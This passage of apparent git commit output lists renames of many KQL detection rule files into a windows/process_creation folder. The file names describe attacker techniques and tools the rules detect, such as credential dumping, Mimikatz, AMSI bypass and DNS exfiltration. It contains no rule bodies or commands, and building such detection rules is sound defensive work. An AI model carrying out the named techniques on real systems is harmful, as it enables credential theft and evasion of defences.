windows/process_creation}/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/detected_windows_software_discovery.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/detection_of_powershell_execution_via_sqlps_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/devicecredentialdeployment_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/devtoolslauncher_exe_executes_specified_binary.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/direct_autorun_keys_modification.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/directory_removal_via_rmdir.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/dirlister_execution.kql (92%) rename KQL/rules/{Impact => windows/process_creation}/disable_important_scheduled_task.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/disable_windows_defender_av_security_monitoring.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/disable_windows_iis_http_logging.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/disabled_ie_security_features.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/disabled_volume_snapshots.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/discovery_of_a_system_time.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/diskshadow_script_mode_execution_from_potential_suspicious_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/diskshadow_script_mode_uncommon_script_extension_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/dism_remove_online_package.kql (100%) 
rename KQL/rules/{Defense Evasion => windows/process_creation}/dll_execution_via_rasautou_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/dll_execution_via_register_cimprovider_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/dll_loaded_via_certoc_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/dll_sideloading_by_vmware_xfer_utility.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/dllhost_exe_execution_anomaly.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/dllunregisterserver_function_call_via_msiexec_exe.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/dns_exfiltration_and_tunneling_tools_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/domain_trust_discovery_via_dsquery.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/driver_dll_installation_via_odbcconf_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/driverquery_exe_execution.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/dropping_of_password_filter_dll.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/dsinternals_suspicious_powershell_cmdlets.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/dumping_of_sensitive_hives_via_reg_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/dumping_process_via_sqldumper_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/dumpminitool_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/dumpstack_log_defender_evasion.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/dynamic_net_compilation_via_csc_exe.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/email_exifiltration_via_powershell.kql (100%) rename KQL/rules/{Persistence => 
windows/process_creation}/enable_lm_hash_storage_proccreation.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/enumerate_all_information_with_whoami_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/enumeration_for_3rd_party_creds_from_cli.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/enumeration_for_credentials_in_registry.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/esentutl_gather_credentials.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/esentutl_steals_browser_information.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/etw_logging_tamper_in_net_processes_via_commandline.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/etw_trace_evasion_activity.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/exchange_powershell_snap_ins_usage.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/execute_code_with_pester_bat.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/execute_code_with_pester_bat_as_parent.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/execute_files_with_msdeploy_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/execute_from_alternate_data_streams.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/execute_pcwrun_exe_to_leverage_follina.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/execution_of_non_existing_file.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/execution_of_powershell_script_in_public_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/execution_of_suspicious_file_type_extension.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/execution_via_stordiag_exe.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/execution_via_workfolders_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/explorer_nouaccheck_flag.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/explorer_process_tree_break.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/exports_critical_registry_keys_to_a_file.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/exports_registry_key_to_a_file.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/file_and_subfolder_enumeration_via_dir_command.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_decoded_from_base64_hex_via_certutil_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/file_decryption_using_gpg4win.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_deletion_via_del.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/file_download_and_execution_via_ieexec_exe.kql (100%) create mode 100644 KQL/rules/windows/process_creation/file_download_from_browser_process_via_inline_url.kql rename KQL/rules/{Command and Control => windows/process_creation}/file_download_from_ip_based_url_via_certoc_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/file_download_from_ip_url_via_curl_exe.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/file_download_using_notepad_gup_utility.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_download_using_protocolhandler_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_download_via_bitsadmin.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql (100%) rename KQL/rules/{Command 
and Control => windows/process_creation}/file_download_via_certoc_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_download_via_installutil_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_download_via_windows_defender_mpcmprun_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_download_with_headless_browser.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_encoded_to_base64_via_certutil_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/file_encryption_using_gpg4win.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/file_recovery_from_backup_via_wbadmin_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_with_suspicious_extension_downloaded_via_bitsadmin.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/files_added_to_an_archive_using_rar_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/filter_driver_unloaded_via_fltmc_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/findstr_gpp_passwords.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/findstr_launching_lnk_file.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/finger_exe_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/firewall_configuration_discovery_via_netsh_exe.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/firewall_disabled_via_netsh_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/firewall_rule_deleted_via_netsh_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/firewall_rule_update_via_netsh_exe.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/forfiles_command_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/forfiles_exe_child_process_masquerading.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/fsutil_drive_enumeration.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/fsutil_suspicious_invocation.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/gpresult_display_group_policy_information.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/gpscript_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/greedy_file_deletion_using_del.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/group_membership_reconnaissance_via_whoami_exe.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/gzip_archive_decode_via_powershell.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/hacktool_adcspwn_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/hacktool_bloodhound_sharphound_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/hacktool_certify_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/hacktool_certipy_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_covenant_powershell_launcher.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_crackmapexec_execution.kql (100%) rename 
KQL/rules/{Privilege Escalation => windows/process_creation}/hacktool_crackmapexec_execution_patterns.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_crackmapexec_powershell_obfuscation.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_crackmapexec_process_patterns.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_default_powersploit_empire_scheduled_task_creation.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/hacktool_dinjector_powershell_cradle_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_dumpert_process_dumper_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_edrsilencer_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_empire_powershell_launch_parameters.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_empire_powershell_uac_bypass.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_execution_pe_metadata.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_f_secure_c3_load_by_rundll32.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_gmer_rootkit_detector_and_remover_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_hashcat_password_cracker_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/hacktool_hollowreaper_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/hacktool_htran_natbypass_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_hydra_password_bruteforce_execution.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/hacktool_impacket_tools_execution.kql (100%) rename KQL/rules/{Privilege Escalation => 
windows/process_creation}/hacktool_impersonate_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_inveigh_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_jlaive_in_memory_assembly_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_koadic_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_krbrelay_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_krbrelayup_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_lazagne_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_mimikatz_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_pchunter_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_potential_impacket_lateral_movement_activity.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_powertool_execution.kql (100%) rename KQL/rules/{Resource Development => windows/process_creation}/hacktool_purplesharp_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_pypykatz_credentials_dumping_activity.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_quarks_pwdump_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_redmimicry_winnti_playbook_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_remotekrbrelay_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_rubeus_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_safetykatz_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_securityxploded_execution.kql (100%) 
rename KQL/rules/{Command and Control => windows/process_creation}/hacktool_sharpchisel_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/hacktool_sharpdpapi_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/hacktool_sharpersist_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_sharpevtmute_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/hacktool_sharpimpersonation_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/hacktool_sharpldapmonitor_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/hacktool_sharpldapwhoami_execution.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/hacktool_sharpmove_tool_execution.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/hacktool_sharpup_privesc_tool_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/hacktool_sharpview_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_sharpwsus_wsuspendu_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/hacktool_silenttrinity_stager_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_sliver_c2_implant_activity_pattern.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/hacktool_soaphound_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hacktool_stracciatella_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/hacktool_trufflesnout_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/hacktool_winpeas_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/hacktool_winpwn_execution.kql (100%) rename KQL/rules/{Lateral Movement => 
windows/process_creation}/hacktool_winrm_access_via_evil_winrm.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_wmiexec_default_powershell_command.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hacktool_xordump_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hardware_model_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/harvesting_of_wifi_credentials_via_netsh_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hh_exe_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/hidden_powershell_in_link_file_pattern.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hiding_files_with_attrib_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/hiding_user_account_via_specialaccounts_registry_key_commandline.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/html_help_hh_exe_suspicious_child_process.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/iis_native_code_module_command_line_installation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/iis_webserver_log_deletion_via_commandline_utilities.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/imagingdevices_unusual_parent_child_processes.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/import_ldap_data_interchange_format_file_via_ldifde_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/import_powershell_modules_from_suspicious_directories_proccreation.kql (100%) rename 
KQL/rules/{Persistence => windows/process_creation}/imports_registry_key_from_a_file.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/imports_registry_key_from_an_ads.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/indirect_command_execution_by_program_compatibility_wizard.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/indirect_command_execution_from_script_file_via_bash_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/indirect_inline_command_execution_via_bash_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/infdefaultinstall_exe_inf_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/insecure_proxy_doh_transfer_via_curl_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/insecure_transfer_via_curl_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/insensitive_subfolder_search_via_findstr_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/install_new_package_via_winget_local_manifest.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/installation_of_wsl_kali_linux.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/interactive_at_job.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/interesting_service_enumeration_via_sc_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/invoke_obfuscation_clip_launcher.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/invoke_obfuscation_compress_obfuscation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/invoke_obfuscation_obfuscated_iex_invocation.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/invoke_obfuscation_stdin_launcher.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/invoke_obfuscation_var_launcher.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/invoke_obfuscation_var_launcher_obfuscation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/invoke_obfuscation_via_stdin.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/invoke_obfuscation_via_use_clip.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/invoke_obfuscation_via_use_mshta.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/java_running_with_remote_debugging.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/jscript_compiler_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/kavremover_dropped_binary_lolbin_usage.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/kernel_memory_dump_via_livekd.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/launch_vsdevshell_ps1_proxy_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/loaded_module_enumeration_via_tasklist_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/local_accounts_discovery.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/local_file_read_using_curl_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/local_groups_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/logged_on_user_password_change_via_ksetup_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/lol_binary_copied_from_system_directory.kql (85%) rename KQL/rules/{Exfiltration => windows/process_creation}/lolbas_data_exfiltration_by_datasvcutil_exe.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/lolbin_runexehelper_use_as_proxy.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/lolbin_unregmp2_exe_use_as_proxy.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/lsa_ppl_protection_disabled_via_reg_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/lsass_dump_keyword_in_commandline.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/lsass_process_reconnaissance_via_findstr_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/malicious_base64_encoded_powershell_keywords_in_command_lines.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/malicious_powershell_commandlets_processcreation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/malicious_windows_script_components_file_execution_by_taef_detection.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/mavinject_inject_dll_into_running_process.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/microsoft_iis_connection_strings_decryption.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/microsoft_iis_service_account_password_dumped.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/mmc20_lateral_movement.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/mmc_spawning_windows_shell.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/modify_group_policy_settings.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/monitoring_for_persistence_via_bits.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/msdt_execution_via_answer_file.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/msexchange_transport_agent_installation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/mshta_execution_with_suspicious_file_extensions.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/mshtml_dll_runhtmlapplication_suspicious_usage.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/msiexec_quiet_installation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/msiexec_web_install.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/mstsc_exe_execution_from_uncommon_parent.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/mstsc_exe_execution_with_local_rdp_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/msxsl_exe_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/net_webclient_casing_anomalies.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/netsh_allow_group_policy_on_microsoft_defender_firewall.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/network_reconnaissance_activity.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/new_activescripteventconsumer_created_via_wmic_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/new_capture_session_launched_via_dxcap_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/new_dll_registered_via_odbcconf_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/new_firewall_rule_added_via_netsh_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/new_generic_credentials_added_via_cmdkey_exe.kql (100%) 
rename KQL/rules/{Persistence => windows/process_creation}/new_kernel_driver_via_sc_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/new_network_trace_capture_started_via_netsh_exe.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/new_port_forwarding_rule_added_via_netsh_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/new_process_created_via_taskmgr_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/new_process_created_via_wmic_exe.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/new_remote_desktop_connection_initiated_via_mstsc_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/new_root_certificate_installed_via_certmgr_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/new_root_certificate_installed_via_certutil_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/new_service_creation_using_powershell.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/new_service_creation_using_sc_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/new_user_created_via_net_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/new_user_created_via_net_exe_with_never_expire_option.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/nltest_exe_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/node_process_executions.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/nodejs_execution_of_javascript_file.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/non_interactive_powershell_process_spawned.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/non_privileged_usage_of_reg_or_powershell.kql (100%) rename 
KQL/rules/{Discovery => windows/process_creation}/notepad_password_files_discovery.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/nslookup_powershell_download_cradle_processcreation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/ntdllpipe_like_activity_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/obfuscated_ip_download_activity.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/obfuscated_ip_via_cli.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/obfuscated_powershell_oneliner_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/odbcconf_exe_suspicious_dll_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/onenote_exe_execution_of_malicious_embedded_scripts.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/openwith_exe_executes_specified_binary.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/operator_bloopers_cobalt_strike_commands.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/operator_bloopers_cobalt_strike_modules.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/outlook_enableunsafeclientmailrules_setting_enabled.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/password_provided_in_command_line_of_net_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/password_set_to_never_expire_via_wmi.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/pdq_deploy_remote_adminstartion_tool_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/perl_inline_command_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/permission_check_via_accesschk_exe.kql 
(100%) rename KQL/rules/{Credential Access => windows/process_creation}/permission_misconfiguration_reconnaissance_via_findstr_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/persistence_via_sticky_key_backdoor.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/persistence_via_typedpaths_commandline.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/phishing_pattern_iso_in_archive.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/php_inline_command_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/ping_hex_ip.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pktmon_exe_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/port_forwarding_activity_via_ssh_exe.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/portable_gpg_exe_execution.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/possible_privilege_escalation_via_weak_service_permissions.kql (100%) rename KQL/rules/{Reconnaissance => windows/process_creation}/potential_active_directory_enumeration_using_ad_module_proccreation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_adplus_exe_abuse.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/potential_amazon_ssm_agent_hijacking.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_amsi_bypass_using_null_bits.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_amsi_bypass_via_net_reflection.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_application_whitelisting_bypass_via_dnx_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_arbitrary_code_execution_via_node_exe.kql (100%) rename KQL/rules/{Defense Evasion => 
